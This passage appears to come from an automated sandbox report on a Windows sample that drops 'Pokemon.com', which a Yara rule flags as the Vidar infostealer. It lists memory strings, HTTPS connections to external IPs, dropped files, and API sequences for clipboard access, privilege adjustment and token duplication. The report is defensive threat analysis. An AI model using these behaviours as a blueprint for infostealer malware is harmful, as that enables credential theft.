                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit_AutofillEnableMerchantOptOutClientSideUrlFilte
                Source: chrome.exe, 00000010.00000002.2711466200.00007C1C00A14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649516669.00007C1C0135C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000010.00000003.2667575304.00007C1C02654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2667503110.00007C1C02650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000010.00000002.2719967502.00007C1C02C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000010.00000003.2670280074.00007C1C02C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2671276001.00007C1C02CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670479425.00007C1C02C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670944427.00007C1C0236C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2669760383.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670976589.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2719967502.00007C1C02C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Pokemon.com, 0000000C.00000002.3080713787.0000000006B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2711963722.00007C1C00A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                Source: chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714074595.00007C1C00D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: chrome.exe, 00000010.00000002.2715404107.00007C1C01054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmetadatade
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:50001 version: TLS 1.2
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0010F7C7
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_0010F55C
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00129FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00129FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00104763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_00104763
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_000F1B4D
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_000FF20D
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\BathAssessedJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\OeElJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\ProperlyConsumerJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\MagnetBeginnersJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\GccFactorsJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Windows\EaseFinalJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B801712_2_000B8017
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000AE14412_2_000AE144
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009E1F012_2_0009E1F0
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CA26E12_2_000CA26E
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000922AD12_2_000922AD
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B22A212_2_000B22A2
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000AC62412_2_000AC624
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CE87F12_2_000CE87F
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0011C8A412_2_0011C8A4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00102A0512_2_00102A05
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000C6ADE12_2_000C6ADE
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F8BFF12_2_000F8BFF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000ACD7A12_2_000ACD7A
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000BCE1012_2_000BCE10
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000C715912_2_000C7159
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009924012_2_00099240
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0012531112_2_00125311
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000996E012_2_000996E0
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B170412_2_000B1704
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B1A7612_2_000B1A76
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00099B6012_2_00099B60
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B7B8B12_2_000B7B8B
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B1D2012_2_000B1D20
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B7DBA12_2_000B7DBA
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B1FE712_2_000B1FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: String function: 000AFD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: String function: 000B0DA0 appears 46 times
                Source: JA7cOAGHym.exeStatic PE information: invalid certificate
                Source: JA7cOAGHym.exe, 00000000.00000003.2026333690.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs JA7cOAGHym.exe
                Source: JA7cOAGHym.exe, 00000000.00000002.2027402695.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs JA7cOAGHym.exe
                Source: JA7cOAGHym.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/290@21/16
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001041FA GetLastError,FormatMessageW,12_2_001041FA
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_000F2010
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1A0B AdjustTokenPrivileges,CloseHandle,12_2_000F1A0B
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_000FDD87
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00103A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00103A0E
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\QIWZO93Q.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeFile created: C:\Users\user\AppData\Local\Temp\nsw163E.tmpJump to behavior
                Source: JA7cOAGHym.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
